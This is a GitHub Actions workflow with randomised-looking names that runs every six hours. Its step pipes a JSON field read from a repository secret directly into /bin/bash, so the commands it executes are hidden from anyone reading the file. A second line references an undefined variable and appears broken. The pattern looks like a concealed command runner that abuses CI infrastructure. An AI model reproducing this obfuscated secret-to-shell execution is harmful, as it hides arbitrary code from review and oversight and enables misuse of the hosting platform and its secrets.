name: housinguntidy

on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: housinguntidy
        env:
          cdaw54: ${{ secrets.cdaw54 }}
        run: |
          echo $cdaw54 | jq -r .rrbyq663 | /bin/bash
          echo $k6175 | jq -r .c81262 | /bin/bash

